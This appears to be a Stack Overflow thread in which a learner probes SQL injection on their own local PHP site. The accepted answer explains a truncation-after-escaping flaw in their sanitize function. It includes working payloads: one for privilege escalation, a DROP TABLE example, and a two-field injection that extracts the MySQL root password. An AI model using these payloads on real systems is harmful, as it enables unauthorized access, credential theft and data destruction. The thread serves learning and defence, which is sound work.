# SQL injection vulnerability magically fixing itself?

Tags: php, mysql, sql-injection

So I found this vulnerability in my website for testing (on a local network)...

```
mysql_query("UPDATE $table_classes SET name = '$fullname9' , sort = '$sort246', welcome = '$welcome_text', show_teacherpage = '$show_teacherpage' WHERE id = '".$class_id."'");
```

main problem lying here...

```
$welcome_text = sanitize($_POST['welcome_text'], 500 , 'U');
```

$welcome_text can be 500 characters and has a U parameter set which means it essentially leaves the input untouched and only add slashes (escape characters) where it sees fit. It doesn't filter keywords line INSERT, OR, etc.

So it looks like I can try something cheeky like this inside the text form...

```
a' WHERE id = '".$class_id."'; UPDATE syn_users SET access = '1111111111111111,1111111111111111111111' WHERE username = 'usertwo'; UPDATE $table_classes SET welcome = '$fullname9
```

With the query becoming...

```
mysql_query("UPDATE $table_classes SET name = '$fullname9' , sort = '$sort246', welcome = 'a' WHERE id = '1'; UPDATE syn_users SET access = '1111111111111111,1111111111111111111111' WHERE username = 'usertwo'; UPDATE syn_classes SET welcome = 'a', show_teacherpage = '$show_teacherpage' WHERE id = '".$class_id."'");
```

escalating my access privileges to those of an admin. After entering this input I expect one of two things to happening. Either I get a query error because I herp derped a quote mark somewhere or a success in which case I gain my new privilege status and also the welcome message on the show page becomes a.

But this doesn't happen. What instead happens is that on the show page I get back exactly what I put into the form. So the database just happily sucked up my un-sanitized injection without actually doing anything, leaving an evident trace of my ill intent in a text field somewhere. I've been beating my head over the wall for a couple of hours now and I can't quite figure out what's causing this...

My notes from security class have examples like this...

```
statement = "SELECT * FROM users WHERE name = '" + userName + "';"

a';DROP TABLE users; SELECT * FROM userinfo WHERE 't' = 't

SELECT * FROM users WHERE name = 'a';DROP TABLE users; SELECT * FROM 
userinfo WHERE 't' = 't';
```

Which is essentially what I'm trying to do, or am I misunderstanding something somewhere. Also magic quotes is turned off.

**EDIT:**

Okay, so I got that depreciated sql functions don't allow for ; .

This led me to try a similar exploit else where.

```
mysql_query("UPDATE $table_users SET name='$fullname9', username='$username8b9', email='$email07e', class='$class4c8', type='$typeb0f', project = '$comma_separated_project', initial = '$initiald' WHERE id = '".$student_id."'");
```

BOOM. I drop this into the form field...

```
a', access ='1111111111111111,1111111111111111111111
```

resulting in this...

```
mysql_query("UPDATE $table_users SET name='a', access='1111111111111111,1111111111111111111111', username='$username8b9', email='$email07e', class='$class4c8', type='$typeb0f', project = '$comma_separated_project', initial = '$initiald' WHERE id = '".$student_id."'");
```

Yet, again the same thing happens.

Sanitize function is as follows.

```
 if ($typeb0f == "I")
{
    //return only integer
    $result4 = intval($inputf1e);
}
elseif ($typeb0f == "S")
{
    $result4 = preg_replace("/<script[^>]*>[^<]+<\/script[^>]*>/is"
                 ,"", $inputf1e);
    $result4 = preg_replace("/<\/?(div|span|iframe|frame|input|body"
                     ."textarea|script|style|applet|object|embed|form)[^>]*>/is"
                 ,"", $result4);
    $result4 = sql_addslashes($result4) ;
}
elseif ($typeb0f == "A")
{
    //only allow alpha characters + @
    $inputf1e = preg_replace("/[^a-zA-Z0-9]@/", "", $inputf1e);
    $result4 = sql_addslashes($inputf1e);
}
elseif ($typeb0f == "U")
{
    //leave untouched, only add slashes if needed.
    $result4 = sql_addslashes($inputf1e);
}
else
{
    //trigger error, we should not enter here
    trigger_error('Sanitize function error: wrong parameter given', E_USER_WARNING);
}
if ($length8 != 0)
{
    //limit the input to $length8 
    $result4 = substr($result4, 0 , $length8);
}

return $result4;
```

Like I said in the comments it isn't a good one.

Comment: The deprecated mysql_ functions in PHP don't allow multiple `;` separated queries.

Comment: use PDO.Just prepare the query and execute it

Comment: Okay, I see, thank you! Now only if I knew how to mark an answer :[

Comment: I'm guessing they don't allow for comments either.

Comment: Regardless, wouldn't call to `sanitize` escape the quotes and the whole nonsensical string end up being set into the `name` field?

Comment: Depending on how `sanitize` is implemented, you still may be vulnerable to SQL injections.

Comment: The sanitize function isn't a very good one, I'll post it in the edit. Depending on the parameter you put in it could allow for any strings (with blacklisted sub strings), alpha numeric strings, etc. In the case of my second attempt the parameter allows for everything except certain java script elements.

Comment: If you really need to use mysql_* then sanitize everything that is string with `mysql_real_escape_string`

Comment: Point in me doing this is to learn about sql injection and how it happens, I'm not building a website for use. :P

Comment: I know all the existing libraries and functions they contain.

Comment: While escaping apostrophes is a good *start*, there are many other nasties to watch out for. For example, a malformed Unicode character could swallow the closing quote (by making it look like part of an invalid multiple-byte character). Unless you know the spec and implementation for your flavour of SQL inside-out, you should not try escaping it yourself. Using prepared statements, the logic is compiled without the strings being anywhere near it (they're added in after), so it is significantly safer.

Comment: To answer your latest comment, MySQL (unlike other SQL flavours) escapes quotes using a backslash, like PHP does, so your added slashes are being interpreted exactly as they should be. If you switched to a different flavour, it would break because normally quotes are escaped by doubling them: `''`

Comment: Good news: you’re still vulnerable! ;) I’ll explain that in my answer.

Comment: If these characters ' and " are escaped I don't get why the show page still gives back a', access ='1111111111111111,1111111111111111111111 shouldn't it be access =1111111111111111,1111111111111111111111?

Answer (score 1, accepted):

Your `sanitize` function fails to escape the string properly when an added backslash happens to be at the last position of the allowed string length.

Suppose that we only want to have strings up to 5 instead of 500 characters and that `$_POST['welcome_text']` contains 4 `A`s and one single quote:

```
$_POST['welcome_text'] = "AAAA'";
```

Now if we call `sanitize($_POST['welcome_text'], 5 , 'U')`, the `sql_addslashes` may escape the string properly, e. g.:

```
AAAA\'
```

However, since the string is truncated to 5 characters *after* the escaping, the retuned string is actually

```
AAAA\
```

This placed in the given `UPDATE` statement would obviously make the closing string delimiter being escaped and the string literal is continued until the next non-escaped single quote:

```
… welcome = 'AAAA\', show_teacherpage = '…
```

This alone would only make the statement syntactically incorrect and thus fail. However, if there are more parameters that are ‘sanitized’ this way, one may able to inject SQL code. For example:

```
welcome_text:     AAAA'
show_teacherpage: , other_column = (SELECT password FROM mysql.user WHERE user = 0x726F6F74 LIMIT 1) #
```

This would result in:

```
… welcome = 'AAAA\', show_teacherpage = ', show_teacherpage = (SELECT password FROM mysql.user WHERE user = 0x726F6F74 LIMIT 1) #
```

*welcome* would contain the value `AAAA', show_teacherpage =` and *show_teacherpage* would hold the *root* user’s password.